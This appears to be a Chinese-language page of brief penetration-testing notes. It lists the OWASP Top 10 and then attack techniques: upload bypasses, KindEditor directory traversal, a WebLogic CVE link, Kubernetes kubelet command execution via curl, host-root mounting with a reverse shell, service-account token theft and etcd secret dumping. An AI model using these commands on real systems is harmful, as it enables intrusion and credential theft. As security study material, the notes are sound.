跳转至

各种漏洞

各种漏洞

OWASP

  1. SQL 注入防护方法:
  2. 失效的身份认证和会话管理
  3. 跨站脚本攻击 XSS
  4. 直接引用不安全的对象
  5. 安全配置错误
  6. 敏感信息泄露
  7. 缺少功能级的访问控制
  8. 跨站请求伪造 CSRF
  9. 使用含有已知漏洞的组件
  10. 未验证的重定向和转发

web 扫描器

逻辑漏洞

任意用户注册 任意支付密码修改

上传漏洞

直接 fuzz 吧: https://github.com/c0ny1/upload-fuzz-dic-builder

win 下的通配符

http://localhost:9000/upload/self_include.php?c=../tmp/php<<
<<相当于*

kindeditor

目录遍历: /kindeditor/php/file_manager_json.php?path=../../../../tmp/

4.1.7:泄漏路径问题,漏洞根源位于/php/file_manager_json.php。

FCKeditor

截断,改文件名,突破目录上传
Todo: https://blog.csdn.net/lizhengnanhua/article/details/38451737

eWebEditor 2.8 5.5

weblogic

  1. CVE-2020-14882 https://github.com/hktalent/CVE_2020_2546

k8s

  1. 直接访问端口,得到所有可用的API,如果配置了ui直接访问/ui
  2. 创建容器挂在根目录,反弹shell
  3. 通过kubelet API /pods路径获得容器运行信息。可以实现命令执行curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://kube-node-here:10250/exec/<namespace>/<podname>/<container-name>?command=touch&command=hello_world&input=1&output=1&tty=1" 通过wscat进行连接。
  4. 读取/run/secrets/kubernetes.io/serviceaccount/token获得token就可以和k8s通信,如果Kubernetes增加了RBAC授权,可能无法使用token进行通信。

etcd

  1. 访问master节点的/v2/keys/?recursive=true 可以得到所有密钥
  2. 使用etcdctletcdctl --endpoint=http://[etcd_server_ip]:2379 ls

评论